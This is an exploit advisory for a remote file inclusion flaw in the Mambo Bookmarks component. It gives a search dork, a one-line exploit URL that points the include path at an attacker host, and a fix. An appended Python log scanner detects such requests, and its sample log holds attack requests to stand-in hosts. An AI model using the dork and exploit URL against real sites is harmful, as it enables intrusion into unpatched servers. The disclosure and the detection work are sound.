Application : Bookmarks - mambo Component
URL : http://mamboxchange.com/frs/download.php/4274/MOS_Com_Bookmarks25-Final_a.zip

Variable $mosConfig_absolute_path is not sanitized. The exploit works with register_globals=on: the variable is taken from the request instead of the Mambo configuration, so the path passed to the include calls in components/com_bookmarks/bookmarks_export.php on lines 22, 27 and 29 becomes attacker-controlled (remote file inclusion).

    require_once( $mosConfig_absolute_path . "/includes/mambo.php" );
    include_once( $mosConfig_absolute_path . '/components/com_bookmarks/language/' . $mosConfig_lang . '.php' );
    include_once( $mosConfig_absolute_path . '/components/com_bookmarks/language/english.php' );

Exploit:
~~~~~~~~
dork: "com_bookmarks"
http://www.vuln.com/components/com_bookmarks/bookmarks_export.php?mosConfig_absolute_path=http://evilhost

Fix
~~~~
Add before the code above:

    defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

Discovered By : vitux
Thanks To : #indolinux@dal.net, #sunda@dal.net, #batamhacker@dal.net, #malanghackerlink@dal.net
Special To : donny indocom, eko indocom, ^BLaCk_BaNDitS^, all the Subang folks, basically everyone
Mail : vitux.manis@gmail.com, pipit_subang@yahoo.com
# cilacap, 12th august 2007
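As an added example that is not part of the advisory, the Python below scans Apache combined-format access-log lines for requests in which a Mambo configuration global (mosConfig_absolute_path or mosConfig_lang, both used in the include paths above) is supplied with a remote URL, which is the request shape the exploit produces; the log lines and IP addresses are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Apache combined format), not taken from the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Aug/2007:10:01:02 +0700] "GET /components/com_bookmarks/bookmarks_export.php?mosConfig_absolute_path=http://203.0.113.99/x HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Aug/2007:10:02:15 +0700] "GET /index.php?option=com_bookmarks HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Aug/2007:10:03:44 +0700] "GET /components/com_bookmarks/bookmarks_export.php?mosConfig_absolute_path=ftp%3A%2F%2Fevil.example%2Fshell HTTP/1.1" 200 512 "-" "curl/7.15"
192.0.2.9 - - [12/Aug/2007:10:04:01 +0700] "GET /components/com_bookmarks/bookmarks_export.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Client IP, then the quoted request line "METHOD PATH PROTOCOL" of a combined-format entry.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')

# Mambo configuration globals that become request-controlled under register_globals=on.
WATCHED_PARAMS = ("mosConfig_absolute_path", "mosConfig_lang")
# A value is "remote" if it starts with scheme:// , scheme: , or a protocol-relative //.
REMOTE_SCHEME_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]+:)?//|^[a-z][a-z0-9+.-]+:', re.I)

def is_rfi_attempt(request_path):
    """Return the offending parameter name if a watched mosConfig_* parameter
    carries a remote (scheme-prefixed or protocol-relative) value, else None."""
    parts = urlsplit(request_path)
    params = parse_qs(parts.query, keep_blank_values=True)
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            # parse_qs decodes one layer; decode once more to catch double-encoded values.
            if REMOTE_SCHEME_RE.match(unquote(value).strip()):
                return name
    return None

def find_rfi_attempts(log_text):
    """Return (client_ip, parameter, path) for each log line that looks like an RFI attempt."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, _method, path = m.groups()
        param = is_rfi_attempt(path)
        if param:
            hits.append((ip, param, path))
    return hits

if __name__ == "__main__":
    for ip, param, path in find_rfi_attempts(SAMPLE_LOG):
        print(f"{ip} RFI attempt via {param}: {path}")
```

A local path such as /var/www/mambo in the same parameter is not flagged, so the check distinguishes remote inclusion attempts from ordinary values.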